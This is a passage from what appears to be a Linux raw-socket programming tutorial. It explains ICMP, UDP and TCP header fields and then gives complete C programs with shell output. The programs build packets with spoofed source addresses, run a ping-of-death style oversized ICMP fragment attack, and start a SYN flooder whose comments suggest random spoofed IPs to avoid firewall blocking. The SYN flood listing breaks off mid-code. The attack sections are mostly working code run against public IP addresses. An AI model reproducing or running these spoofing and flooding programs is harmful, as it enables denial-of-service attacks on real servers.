Checksum: The 16-bit one's complement of the one's complement sum of the ICMP message starting with the ICMP Type. For computing the checksum, the checksum field should be zero. This is the checksum for the ICMP header + data, computed in the same way as the IP checksum. Note: the next 32 bits in an ICMP packet can be used in many different ways, depending on the ICMP type and code. The most commonly seen structure, an ID and sequence number, is used in echo requests and replies, but keep in mind that the header is actually more complex.

Identifier: An identifier to aid in matching requests/replies; may be zero. Used in echo request/reply messages for identification.

Sequence number: Sequence number to aid in matching requests/replies; may be zero. Used to identify the sequence of echo messages, if more than one is sent.

Table 10: ICMP header fields description.

The following is an example of the ICMP header format as defined in the above structure for the Echo or Echo Reply Message.

Figure 25: An example of the ICMP header format for the Echo or Echo Reply Message.

The description:

Field: Description

Type: 8 - for echo message; 0 - for echo reply message.

Code: 0.

Checksum: The checksum is the 16-bit one's complement of the one's complement sum of the ICMP message starting with the ICMP Type. For computing the checksum, the checksum field should be zero. If the total length is odd, the received data is padded with one octet of zeros for computing the checksum. This checksum may be replaced in the future.

Identifier: If code = 0, an identifier to aid in matching echoes and replies, may be zero.

Sequence number: If code = 0, a sequence number to aid in matching echoes and replies, may be zero.

Description: The data received in the echo message must be returned in the echo reply message. The identifier and sequence number may be used by the echo sender to aid in matching the replies with the echo requests. For example, the identifier might be used like a port in TCP or UDP to identify a session, and the sequence number might be incremented on each echo request sent. The echoer returns these same values in the echo reply. Code 0 may be received from a gateway or a host.

Table 11: ICMP header fields for Echo or Echo Reply Message description.

UDP

The User Datagram Protocol is a transport protocol for sessions that need to exchange data. Both transport protocols, UDP and TCP, provide 65,536 (2^16) source and destination port numbers (0 to 65535), standard and non-standard. The destination port is used to connect to a specific service on that port. Unlike TCP, UDP is not reliable, since it uses neither sequence numbers nor stateful connections. This means UDP datagrams can be spoofed and can be lost unnoticed, since they are not acknowledged using replies and sequence numbers. The following figure shows the UDP header format.

Figure 26: UDP header format.

As an example, we can define a structure for the UDP header as follows.

struct udpheader {
    unsigned short int udph_srcport;
    unsigned short int udph_destport;
    unsigned short int udph_len;
    unsigned short int udph_chksum;
};
/* total udp header length: 8 bytes (= 64 bits) */

A brief description:

Source port (udph_srcport): The source port that a client binds to, and that the contacted server replies to in order to direct its responses to the client. It is an optional field; when meaningful, it indicates the port of the sending process, and may be assumed to be the port to which a reply should be addressed in the absence of any other information. If not used, a value of zero is inserted.

Destination port (udph_destport): The destination port that a specific server can be contacted on.

Length (udph_len): The length of the UDP header and payload data in bytes. It is the length in bytes of this user datagram including this header and the data. (This means the minimum value of the length is eight.)

Checksum (udph_chksum): The checksum of header and data, see IP checksum. It is the 16-bit one's complement of the one's complement sum of a pseudo header (shown in the following figure) of information from the IP header, the UDP header, and the data, padded with zero octets at the end (if necessary) to make a multiple of two octets. The pseudo header conceptually prefixed to the UDP header contains the source address, the destination address, the protocol and the UDP length. This information gives protection against misrouted datagrams. The same checksum procedure is used in TCP. If the computed checksum is zero, it is transmitted as all ones (the equivalent in one's complement arithmetic). An all zero transmitted checksum value means that the transmitter generated no checksum (for debugging or for higher level protocols that don't care).

Table 12: UDP header fields description.
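To make the pseudo header rule concrete, the following is a small sketch of the UDP checksum as Table 12 describes it. The function name udp_checksum and the helper add_words are assumptions made for this example only. Addresses are passed as host-order 32-bit values (for instance 0x0A000001 for 10.0.0.1), and the caller is expected to have set the checksum field inside the UDP header to zero beforehand.

```c
#include <stddef.h>
#include <stdint.h>

/* Adds len bytes to a running sum as big-endian 16-bit words,
   padding an odd trailing byte with a zero octet. */
static uint32_t add_words(uint32_t sum, const uint8_t *p, size_t len)
{
    size_t i;

    for (i = 0; i + 1 < len; i += 2)
        sum += ((uint32_t)p[i] << 8) | p[i + 1];
    if (i < len)
        sum += (uint32_t)p[i] << 8;
    return sum;
}

/* Checksum over pseudo header + UDP header + data.
   udp points at the UDP header, udp_len is header plus data in bytes. */
uint16_t udp_checksum(uint32_t src_ip, uint32_t dst_ip,
                      const uint8_t *udp, size_t udp_len)
{
    uint32_t sum = 0;
    uint16_t ck;

    /* Pseudo header: source, destination, zero byte + protocol 17, UDP length */
    sum += (src_ip >> 16) + (src_ip & 0xffff);
    sum += (dst_ip >> 16) + (dst_ip & 0xffff);
    sum += 17;
    sum += (uint32_t)udp_len;

    sum = add_words(sum, udp, udp_len);
    while (sum >> 16)
        sum = (sum & 0xffff) + (sum >> 16);
    ck = (uint16_t)~sum;

    /* A computed zero is transmitted as all ones */
    return ck == 0 ? 0xffff : ck;
}
```

The same routine would serve for TCP by replacing the protocol value 17 with 6, since the table notes that TCP uses the same procedure.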

Figure 27: UDP pseudo header format.

TCP

The Transmission Control Protocol is the most widely used transport protocol. It provides mechanisms to establish a reliable connection with some basic authentication, using connection states and sequence numbers. The following is the TCP header format.

Figure 28: TCP header format.

And a structure example for the TCP header fields.

struct tcpheader {
    unsigned short int tcph_srcport;
    unsigned short int tcph_destport;
    unsigned int       tcph_seqnum;
    unsigned int       tcph_acknum;
    unsigned char      tcph_reserved:4, tcph_offset:4;
    unsigned char      tcph_flags;
    unsigned short int tcph_win;
    unsigned short int tcph_chksum;
    unsigned short int tcph_urgptr;
};
/* total tcp header length: 20 bytes (= 160 bits) */

A brief description:

tcph_srcport: The 16-bit source port, which has the same function as in UDP.

tcph_destport: The 16-bit destination port, which has the same function as in UDP.

tcph_seqnum: The 32-bit sequence number of the first data octet in this segment (except when SYN is present). If SYN is present, the sequence number is the initial sequence number (ISN) and the first data octet is ISN+1. It is used to enumerate the TCP segments. The data in a TCP connection can be contained in any number of segments (single TCP datagrams), which will be put in order and acknowledged. For example, if you send 3 segments, each containing 32 bytes of data, the first sequence would be (N+)1, the second one (N+)33 and the third one (N+)65. "N+" because the initial sequence number is random.

tcph_acknum: 32 bits. If the ACK control bit is set, this field contains the value of the next sequence number the sender of the segment is expecting to receive. Once a connection is established this is always sent. Every packet that is sent and is a valid part of a connection is acknowledged with an empty TCP segment with the ACK flag set (see below), and the tcph_acknum field containing the previous tcph_seqnum number.

tcph_offset: The segment offset specifies the length of the TCP header in 32-bit (4-byte) blocks. Without TCP header options, the value is 5.

tcph_reserved: 4 bits reserved for future use. This is unused and must contain binary zeroes.

tcph_flags: This field consists of six flag bits (left to right). They can be ORed.
TH_URG - Urgent. Segment will be routed faster, used for termination of a connection or to stop processes (using the telnet protocol).
TH_ACK - Acknowledgement. Used to acknowledge data and in the second and third stage of a TCP connection initiation.
TH_PSH - Push. The system's IP stack will not buffer the segment and will forward it to the application immediately (mostly used with telnet).
TH_RST - Reset. Tells the peer that the connection has been terminated.
TH_SYN - Synchronization. A segment with the SYN flag set indicates that the client wants to initiate a new connection to the destination port.
TH_FIN - Final. The connection should be closed; the peer is supposed to answer with one last segment with the FIN flag set as well.

tcph_win: 16-bit window. The number of bytes that can be sent before the data should be acknowledged with an ACK before sending more segments.

tcph_chksum: The checksum field is the 16-bit one's complement of the one's complement sum of all 16-bit words in the header and text. If a segment contains an odd number of header and text octets to be checksummed, the last octet is padded on the right with zeros to form a 16-bit word for checksum purposes. The pad is not transmitted as part of the segment. While computing the checksum, the checksum field itself is replaced with zeros. It is the checksum of the pseudo header, the TCP header and the payload. The pseudo header is a structure containing the IP source and destination addresses, 1 byte set to zero, the protocol (1 byte with a decimal value of 6), and 2 bytes (unsigned short) containing the total length of the TCP segment. The checksum thus also covers a 96-bit pseudo header (shown in the following figure) conceptually prefixed to the TCP header. This pseudo header contains the Source Address, the Destination Address, the Protocol, and the TCP length. This gives the TCP protection against misrouted segments. This information is carried in the Internet Protocol and is transferred across the TCP/Network interface in the arguments or results of calls by the TCP on the IP.

tcph_urgptr: Urgent pointer. Only used if the TH_URG flag is set, else zero. It points to the end of the payload data that should be sent with priority.

Table 13: TCP header fields description.
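A few of the fields in Table 13 lend themselves to a short worked sketch: flags being ORed together, the offset counted in 4-byte blocks, and the sequence number arithmetic from the three-segment example. The names below (FLAG_*, tcp_header_bytes, next_seq, is_syn_ack) are made up for this illustration; the flag values are the bit positions of the six flags within the flags byte.

```c
#include <stdint.h>

/* Bit masks of the six flags inside the flags byte */
enum {
    FLAG_FIN = 0x01,
    FLAG_SYN = 0x02,
    FLAG_RST = 0x04,
    FLAG_PSH = 0x08,
    FLAG_ACK = 0x10,
    FLAG_URG = 0x20
};

/* Header length in bytes from the 4-bit offset field (32-bit blocks) */
unsigned tcp_header_bytes(unsigned offset_words)
{
    return offset_words * 4u;
}

/* Sequence number of the segment following one that carried payload_len
   bytes. Unsigned arithmetic wraps modulo 2^32, like TCP sequence space. */
uint32_t next_seq(uint32_t seq, uint32_t payload_len)
{
    return seq + payload_len;
}

/* True when both SYN and ACK are set, as in the second handshake step */
int is_syn_ack(uint8_t flags)
{
    return (flags & (FLAG_SYN | FLAG_ACK)) == (FLAG_SYN | FLAG_ACK);
}
```

With an offset of 5 the header is 20 bytes, and starting from sequence 1 with 32-byte segments, next_seq gives 33 and then 65, matching the example in the table.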

Figure 29: TCP pseudo header format. The TCP Length is the TCP header length plus the data length in octets (this is not an explicitly transmitted quantity, but is computed), and it does not count the 12 octets of the pseudo header.

LINUX SOCKET PART 17 Advanced TCP/IP - THE RAW SOCKET PROGRAM EXAMPLES
This is a continuation from Part IV series, Advanced TCP/IP Programming Tutorial. Working program examples, if any, were compiled using gcc, tested using public IPs, and run on Fedora Core 3 (updated several times) as root or SUID 0. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to the default configuration.

Building and injecting RAW datagrams program examples

[root@bakawali testraw]# cat rawudp.c
// ----rawudp.c-----
// Must be run by root. Just datagram, no payload/data
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>

// The packet length
#define PCKT_LEN 8192

// Can create separate header file (.h) for all headers' structure
// The IP header's structure (20 bytes; bit-field order is for little-endian hosts)
struct ipheader {
    unsigned char      iph_ihl:4, iph_ver:4;
    unsigned char      iph_tos;
    unsigned short int iph_len;
    unsigned short int iph_ident;
    unsigned short int iph_offset;   // 3 flag bits + 13-bit fragment offset
    unsigned char      iph_ttl;
    unsigned char      iph_protocol;
    unsigned short int iph_chksum;
    unsigned int       iph_sourceip;
    unsigned int       iph_destip;
};

// UDP header's structure
struct udpheader {
    unsigned short int udph_srcport;
    unsigned short int udph_destport;
    unsigned short int udph_len;
    unsigned short int udph_chksum;
};
// total udp header length: 8 bytes (=64 bits)

// Function for checksum calculation. From the RFC,
// the checksum algorithm is:
// "The checksum field is the 16 bit one's complement of the one's
// complement sum of all 16 bit words in the header. For purposes of
// computing the checksum, the value of the checksum field is zero."
unsigned short csum(unsigned short *buf, int nwords)
{
    unsigned long sum;

    for(sum = 0; nwords > 0; nwords--)
        sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}

// Source IP, source port, target IP, target port from the command line arguments
int main(int argc, char *argv[])
{
    int sd;
    // No data/payload just datagram
    char buffer[PCKT_LEN];
    // Our own headers' structures
    struct ipheader *ip = (struct ipheader *) buffer;
    struct udpheader *udp = (struct udpheader *) (buffer + sizeof(struct ipheader));
    // Source and destination addresses: IP and port
    struct sockaddr_in sin, din;
    int one = 1;
    const int *val = &one;
    int count;

    memset(buffer, 0, PCKT_LEN);
    memset(&sin, 0, sizeof(sin));
    memset(&din, 0, sizeof(din));

    if(argc != 5)
    {
        printf("- Invalid parameters!!!\n");
        printf("- Usage %s <source hostname/IP> <source port> <target hostname/IP> <target port>\n", argv[0]);
        exit(-1);
    }

    // Create a raw socket with UDP protocol
    sd = socket(PF_INET, SOCK_RAW, IPPROTO_UDP);
    if(sd < 0)
    {
        perror("socket() error");
        // If something wrong just exit
        exit(-1);
    }
    else
        printf("socket() - Using SOCK_RAW socket and UDP protocol is OK.\n");

    // The source is redundant, may be used later if needed
    // The address family
    sin.sin_family = AF_INET;
    din.sin_family = AF_INET;
    // Port numbers
    sin.sin_port = htons(atoi(argv[2]));
    din.sin_port = htons(atoi(argv[4]));
    // IP addresses
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    din.sin_addr.s_addr = inet_addr(argv[3]);

    // Fabricate the IP header or we can use the
    // standard header structures but assign our own values.
    ip->iph_ihl = 5;
    ip->iph_ver = 4;
    ip->iph_tos = 16; // Low delay
    // Kept in host order so it can double as the sendto() length;
    // Linux fills in the total length field itself for IP_HDRINCL sockets
    ip->iph_len = sizeof(struct ipheader) + sizeof(struct udpheader);
    ip->iph_ident = htons(54321);
    ip->iph_ttl = 64; // hops
    ip->iph_protocol = 17; // UDP
    // Source IP address, can use spoofed address here!!!
    ip->iph_sourceip = inet_addr(argv[1]);
    // The destination IP address
    ip->iph_destip = inet_addr(argv[3]);

    // Fabricate the UDP header. Source port number, redundant
    udp->udph_srcport = htons(atoi(argv[2]));
    // Destination port number
    udp->udph_destport = htons(atoi(argv[4]));
    udp->udph_len = htons(sizeof(struct udpheader));
    // udph_chksum stays zero, which in UDP means "no checksum generated"

    // Calculate the IP header checksum for integrity.
    // It covers the IP header only and csum() counts 16-bit words.
    ip->iph_chksum = csum((unsigned short *)buffer, sizeof(struct ipheader) / 2);

    // Inform the kernel do not fill up the packet structure. we will build our own...
    if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0)
    {
        perror("setsockopt() error");
        exit(-1);
    }
    else
        printf("setsockopt() is OK.\n");

    // Send loop, send every 2 seconds for 20 counts
    printf("Trying...\n");
    printf("Using raw socket and UDP protocol\n");
    printf("Using Source IP: %s port: %u, Target IP: %s port: %u.\n", argv[1], atoi(argv[2]), argv[3], atoi(argv[4]));

    for(count = 1; count <= 20; count++)
    {
        // The datagram is addressed to the target (din), not the source
        if(sendto(sd, buffer, ip->iph_len, 0, (struct sockaddr *)&din, sizeof(din)) < 0)
        {
            perror("sendto() error");
            exit(-1);
        }
        else
        {
            printf("Count #%u - sendto() is OK.\n", count);
            sleep(2);
        }
    }
    close(sd);
    return 0;
}

[root@bakawali testraw]# gcc rawudp.c -o rawudp
[root@bakawali testraw]# ./rawudp
- Invalid parameters!!!

- Usage ./rawudp <source hostname/IP> <source port> <target hostname/IP> <target port>
[root@bakawali testraw]# ./rawudp 192.168.10.10 21 203.106.93.91 8080
socket() - Using SOCK_RAW socket and UDP protocol is OK.
setsockopt() is OK.
Trying...
Using raw socket and UDP protocol
Using Source IP: 192.168.10.10 port: 21, Target IP: 203.106.93.91 port: 8080.
Count #1 - sendto() is OK.
Count #2 - sendto() is OK.
Count #3 - sendto() is OK.
Count #4 - sendto() is OK.
Count #5 - sendto() is OK.
Count #6 - sendto() is OK.
Count #7 - sendto() is OK.
...

You can use network monitoring tools to capture the raw socket datagrams at the target machine to see the effect. The following is a raw socket and TCP program example.

[root@bakawali testraw]# cat rawtcp.c
//---cat rawtcp.c---
// Run as root or SUID 0, just datagram no data/payload
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

// Packet length
#define PCKT_LEN 8192

// May create separate header file (.h) for all
// headers' structures
// IP header's structure (20 bytes)
struct ipheader {
    unsigned char      iph_ihl:4, /* Little-endian */
                       iph_ver:4;
    unsigned char      iph_tos;
    unsigned short int iph_len;
    unsigned short int iph_ident;
    unsigned short int iph_offset;   /* 3 flag bits + 13-bit fragment offset */
    unsigned char      iph_ttl;
    unsigned char      iph_protocol;
    unsigned short int iph_chksum;
    unsigned int       iph_sourceip;
    unsigned int       iph_destip;
};

/* Structure of a TCP header (20 bytes) */
struct tcpheader {
    unsigned short int tcph_srcport;
    unsigned short int tcph_destport;
    unsigned int       tcph_seqnum;
    unsigned int       tcph_acknum;
    unsigned char      tcph_reserved:4, /*little-endian*/
                       tcph_offset:4;   /*length of tcp header in 32-bit words*/
    unsigned char      tcph_fin:1,      /*Finish flag "fin"*/
                       tcph_syn:1,      /*Synchronize sequence numbers to start a connection*/
                       tcph_rst:1,      /*Reset flag */
                       tcph_psh:1,      /*Push, sends data to the application*/
                       tcph_ack:1,      /*acknowledge*/
                       tcph_urg:1,      /*urgent pointer*/
                       tcph_res2:2;
    unsigned short int tcph_win;
    unsigned short int tcph_chksum;
    unsigned short int tcph_urgptr;
};

// Simple checksum function, may use others such as Cyclic Redundancy Check, CRC
// len is the number of 16-bit words to sum
unsigned short csum(unsigned short *buf, int len)
{
    unsigned long sum;

    for(sum = 0; len > 0; len--)
        sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}

int main(int argc, char *argv[])
{
    int sd;
    // No data, just datagram
    char buffer[PCKT_LEN];
    // The size of the headers
    struct ipheader *ip = (struct ipheader *) buffer;
    struct tcpheader *tcp = (struct tcpheader *) (buffer + sizeof(struct ipheader));
    struct sockaddr_in sin, din;
    int one = 1;
    const int *val = &one;
    unsigned int count;

    memset(buffer, 0, PCKT_LEN);
    memset(&sin, 0, sizeof(sin));
    memset(&din, 0, sizeof(din));

    if(argc != 5)
    {
        printf("- Invalid parameters!!!\n");
        printf("- Usage: %s <source hostname/IP> <source port> <target hostname/IP> <target port>\n", argv[0]);
        exit(-1);
    }

    sd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    if(sd < 0)
    {
        perror("socket() error");
        exit(-1);
    }
    else
        printf("socket()-SOCK_RAW and tcp protocol is OK.\n");

    // The source is redundant, may be used later if needed
    // Address family
    sin.sin_family = AF_INET;
    din.sin_family = AF_INET;
    // Source port, can be any, modify as needed
    sin.sin_port = htons(atoi(argv[2]));
    din.sin_port = htons(atoi(argv[4]));
    // Source IP, can be any, modify as needed
    sin.sin_addr.s_addr = inet_addr(argv[1]);
    din.sin_addr.s_addr = inet_addr(argv[3]);

    // IP structure
    ip->iph_ihl = 5;
    ip->iph_ver = 4;
    ip->iph_tos = 16;
    // Host order so it can double as the sendto() length;
    // Linux fills in the total length field for IP_HDRINCL sockets
    ip->iph_len = sizeof(struct ipheader) + sizeof(struct tcpheader);
    ip->iph_ident = htons(54321);
    ip->iph_offset = 0;
    ip->iph_ttl = 64;
    ip->iph_protocol = 6; // TCP
    ip->iph_chksum = 0; // Must be zero while the checksum is computed
    // Source IP, modify as needed, spoofed, we accept through command line argument
    ip->iph_sourceip = inet_addr(argv[1]);
    // Destination IP, modify as needed, but here we accept through command line argument
    ip->iph_destip = inet_addr(argv[3]);

    // The TCP structure. The source port, spoofed, we accept through the command line
    tcp->tcph_srcport = htons(atoi(argv[2]));
    // The destination port, we accept through command line
    tcp->tcph_destport = htons(atoi(argv[4]));
    tcp->tcph_seqnum = htonl(1);
    tcp->tcph_acknum = 0;
    tcp->tcph_offset = 5;
    tcp->tcph_syn = 1;
    tcp->tcph_ack = 0;
    tcp->tcph_win = htons(32767);
    // Left at zero in this example. The kernel does not compute the TCP
    // checksum on a raw socket, so a receiver that validates it will
    // discard the segment.
    tcp->tcph_chksum = 0;
    tcp->tcph_urgptr = 0;

    // IP checksum calculation: IP header only, counted in 16-bit words
    ip->iph_chksum = csum((unsigned short *) buffer, sizeof(struct ipheader) / 2);

    // Inform the kernel do not fill up the headers' structure, we fabricated our own
    if(setsockopt(sd, IPPROTO_IP, IP_HDRINCL, val, sizeof(one)) < 0)
    {
        perror("setsockopt() error");
        exit(-1);
    }
    else
        printf("setsockopt() is OK\n");

    printf("Using:::::Source IP: %s port: %u, Target IP: %s port: %u.\n", argv[1], atoi(argv[2]), argv[3], atoi(argv[4]));

    // sendto() loop, send every 2 seconds for 20 counts
    for(count = 0; count < 20; count++)
    {
        // The datagram is addressed to the target (din), not the source
        if(sendto(sd, buffer, ip->iph_len, 0, (struct sockaddr *)&din, sizeof(din)) < 0)
        {
            perror("sendto() error");
            exit(-1);
        }
        else
            printf("Count #%u - sendto() is OK\n", count);
        sleep(2);
    }
    close(sd);
    return 0;
}

[root@bakawali testraw]# gcc rawtcp.c -o rawtcp
[root@bakawali testraw]# ./rawtcp
- Invalid parameters!!!
- Usage: ./rawtcp <source hostname/IP> <source port> <target hostname/IP> <target port>
[root@bakawali testraw]# ./rawtcp 10.10.10.100 23 203.106.93.88 8008
socket()-SOCK_RAW and tcp protocol is OK.
setsockopt() is OK
Using:::::Source IP: 10.10.10.100 port: 23, Target IP: 203.106.93.88 port: 8008.
Count #0 - sendto() is OK
Count #1 - sendto() is OK
Count #2 - sendto() is OK
Count #3 - sendto() is OK
Count #4 - sendto() is OK
...

Network utility applications such as ping and traceroute (check the Unix/Linux man pages) use ICMP and raw sockets. The following is a very loose ping and ICMP program example. It is taken from a ping-of-death program.

[root@bakawali testraw]# cat myping.c
/* Must be root or SUID 0 to open RAW socket */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <string.h>
#include <strings.h>
#include <arpa/inet.h>

int main(int argc, char *argv[])
{
    int s, i;
    char buf[400];
    struct ip *ip = (struct ip *)buf;
    struct icmphdr *icmp = (struct icmphdr *)(ip + 1);
    struct hostent *hp, *hp2;
    struct sockaddr_in dst;

    int offset;
    int on;
    int num = 100;

    if(argc < 3)
    {
        printf("\nUsage: %s <saddress> <dstaddress> [number]\n", argv[0]);
        printf("- saddress is the spoofed source address\n");
        printf("- dstaddress is the target\n");
        printf("- number is the number of packets to send, 100 is the default\n");
        exit(1);
    }

    /* If enough argument supplied */
    if(argc == 4)
        /* Copy the packet number */
        num = atoi(argv[3]);

    /* Loop based on the packet number */
    for(i = 1; i <= num; i++)
    {
        on = 1;
        bzero(buf, sizeof(buf));
        memset(&dst, 0, sizeof(dst));

        /* Create RAW socket */
        if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
        {
            perror("socket() error");
            /* If something wrong, just exit */
            exit(1);
        }

        /* socket options, tell the kernel we provide the IP structure */
        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on)) < 0)
        {
            perror("setsockopt() for IP_HDRINCL error");
            exit(1);
        }

        if((hp = gethostbyname(argv[2])) == NULL)
        {
            if((ip->ip_dst.s_addr = inet_addr(argv[2])) == INADDR_NONE)
            {
                fprintf(stderr, "%s: Can't resolve, unknown host.\n", argv[2]);
                exit(1);
            }
        }
        else
            bcopy(hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);

        /* The following source address just redundant for target to collect */
        if((hp2 = gethostbyname(argv[1])) == NULL)
        {
            if((ip->ip_src.s_addr = inet_addr(argv[1])) == INADDR_NONE)
            {
                fprintf(stderr, "%s: Can't resolve, unknown host\n", argv[1]);
                exit(1);
            }
        }
        else
            bcopy(hp2->h_addr_list[0], &ip->ip_src.s_addr, hp2->h_length);

        printf("Sending to %s from spoofed %s\n", inet_ntoa(ip->ip_dst), argv[1]);

        /* Ip structure, check the ip.h */
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = htons(sizeof(buf));
        ip->ip_id = htons(4321);
        ip->ip_off = htons(0);
        ip->ip_ttl = 255;
        ip->ip_p = 1;
        ip->ip_sum = 0; /* Let kernel fills in */

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

        icmp->type = ICMP_ECHO;
        icmp->code = 0;
        /* Header checksum */
        icmp->checksum = htons(~(ICMP_ECHO << 8));

        for(offset = 0; offset < 65536; offset += (sizeof(buf) - sizeof(*ip)))
        {
            ip->ip_off = htons(offset >> 3);
            if(offset < 65120)
                ip->ip_off |= htons(0x2000);
            else
                ip->ip_len = htons(418); /* make total 65538 */

            /* sending time */
            if(sendto(s, buf, sizeof(buf), 0, (struct sockaddr *)&dst, sizeof(dst)) < 0)
            {
                fprintf(stderr, "offset %d: ", offset);
                perror("sendto() error");
            }
            else
                printf("sendto() is OK.\n");

            /* IF offset = 0, define our ICMP structure */
            if(offset == 0)
            {
                icmp->type = 0;
                icmp->code = 0;
                icmp->checksum = 0;
            }
        }
        /* close socket */
        close(s);
        usleep(30000);
    }
    return 0;
}

[root@bakawali testraw]# gcc myping.c -o myping
[root@bakawali testraw]# ./myping

Usage: ./myping <saddress> <dstaddress> [number]
- saddress is the spoofed source address
- dstaddress is the target
- number is the number of packets to send, 100 is the default
[root@bakawali testraw]# ./myping 1.2.3.4 203.106.93.94 10000
sendto() is OK.
sendto() is OK.
...
...
sendto() is OK.
sendto() is OK.
Sending to 203.106.93.88 from spoofed 1.2.3.4
sendto() is OK.
...

You can verify this attack at the target machine by issuing the tcpdump -vv command or other network analyzer tools such as Ethereal/Wireshark.

LINUX SOCKET PART 18 Advanced TCP/IP - OTHER TCP/IP INFO


This is a continuation from Part IV series, Advanced TCP/IP Programming Tutorial. Working program examples, if any, were compiled using gcc, tested using public IPs, and run on Fedora Core 3 (updated several times) as root or SUID 0. The Fedora machine used for the testing had "No Stack Execute" disabled and SELinux set to the default configuration.

SYN Flag Flooding

Recall the TCP "three-way handshake" described previously: when the server gets a connection request (SYN), it sends a SYN-ACK back to the source address, which in this attack is spoofed and normally doesn't exist. The server keeps the connection pending until the ACK segment arrives or the entry times out (often called a half-open connection). Since the server connection queue resource is limited, flooding the server with continuous SYN segments can slow down the server or completely push it offline. This SYN flooding technique involves spoofing the IP address and sending multiple SYN segments to a server. In this case, a full TCP connection is never established. We can also write code that sends SYN packets with randomly spoofed IPs to avoid firewall blocking. This results in all the live hosts in our spoofed IP list sending RST segments to the victim server upon getting the SYN-ACK from the victim. This can choke the target server and often forms a crucial part of a Denial of Service (DoS) attack. When the attack is launched by many zombie hosts from various locations, all targeting the same victim, it becomes a Distributed DoS (DDoS). In the worst case, this DoS/DDoS attack might be combined with other exploits such as buffer overflow. DoS/DDoS attacks also normally use transit hosts as launching pads. This means the attack may come from a valid IP/domain name, masking the real initiators. The following is a program example that constantly sends out SYN requests to a host (SYN flooder).
[root@bakawali testraw]# cat synflood.c
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

/* TCP flags, can define something like this if needed */
/*
#define URG 32
#define ACK 16
#define PSH 8
#define RST 4
#define SYN 2
#define FIN 1
*/

struct ipheader {
    unsigned char      iph_ihl:4, /* Little-endian */
                       iph_ver:4;
    unsigned char      iph_tos;
    unsigned short int iph_len;
    unsigned short int iph_ident;
    unsigned short int iph_offset;   /* 3 flag bits + 13-bit fragment offset */
    unsigned char      iph_ttl;
    unsigned char      iph_protocol;
    unsigned short int iph_chksum;
    unsigned int       iph_sourceip;
    unsigned int       iph_destip;
};

/* Structure of the TCP header */
struct tcpheader {
    unsigned short int tcph_srcport;
    unsigned short int tcph_destport;
    unsigned int       tcph_seqnum;
    unsigned int       tcph_acknum;
    unsigned char      tcph_reserved:4, /*little-endian*/
                       tcph_offset:4;   /*length of tcp header in 32-bit words*/
    unsigned char      tcph_fin:1,      /*Finish flag "fin"*/
                       tcph_syn:1,      /*Synchronize sequence numbers to start a connection*/
                       tcph_rst:1,      /*Reset flag */
                       tcph_psh:1,      /*Push, sends data to the application*/
                       tcph_ack:1,      /*acknowledge*/
                       tcph_urg:1,      /*urgent pointer*/
                       tcph_res2:2;
    unsigned short int tcph_win;
    unsigned short int tcph_chksum;
    unsigned short int tcph_urgptr;
};

/* function for header checksums */
unsigned short csum (unsigned short *buf, int nwords)
{
    unsigned long sum;

    for (sum = 0; nwords > 0; nwords--)
        sum += *buf++;
    sum = (sum >> 16) + (sum & 0xffff);
    sum += (sum >> 16);
    return (unsigned short)(~sum);
}

int main(int argc, char *argv[ ])
{
    /* open raw socket */
    int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
    /* this buffer will contain ip header, tcp header, and payload
       we'll point an ip header structure at its beginning,
       and a tcp header structure after that to write the header values into it */
    char datagram[4096];
    struct ipheader *iph = (struct ipheader *) datagram;
    struct tcpheader *tcph = (struct tcpheader *) (datagram + sizeof (struct ipheader));
    struct sockaddr_in sin;

    if(argc != 3)
    {
        printf("Invalid parameters!\n");
        printf("Usage: %s <target IP/hostname> <port to be flooded>\n", argv[0]);
        exit(-1);
    }
    if(s < 0)
    {
        perror("socket() error");
        exit(-1);
    }

    unsigned int floodport = atoi(argv[2]);

    /* the sockaddr_in structure containing the destination address is used
       in sendto() to determine the datagrams path */
    memset(&sin, 0, sizeof(sin));
    sin.sin_family = AF_INET;
    /* you byte-order >1byte header values to network byte order
       (not needed on big-endian machines). */
    sin.sin_port = htons(floodport);
    sin.sin_addr.s_addr = inet_addr(argv[1]);

    /* zero out the buffer */
    memset(datagram, 0, 4096);

    /* we'll now fill in the ip/tcp header values */
    iph->iph_ihl = 5;
    iph->iph_ver = 4;
    iph->iph_tos = 0;
    /* just datagram, no payload. You can add payload as needed.
       Kept in host order so it can double as the sendto() length;
       Linux fills in the total length field for IP_HDRINCL sockets */
    iph->iph_len = sizeof (struct ipheader) + sizeof (struct tcpheader);
    /* the value doesn't matter here (16-bit field, so htons) */
    iph->iph_ident = htons (54321);
    iph->iph_offset = 0;
    iph->iph_ttl = 255;
    iph->iph_protocol = 6; // upper layer protocol, TCP
    /* set it to 0 before computing the actual checksum later */
    iph->iph_chksum = 0;

    /* SYN's can be blindly spoofed. Better to create randomly
       generated IP to avoid blocking by firewall */
    iph->iph_sourceip = inet_addr ("192.168.3.100");
    /* Better if we can create a range of destination IP,
       so we can flood all of them at the same time */
    iph->iph_destip = sin.sin_addr.s_addr;

    /* arbitrary port for source */
    tcph->tcph_srcport = htons (5678);
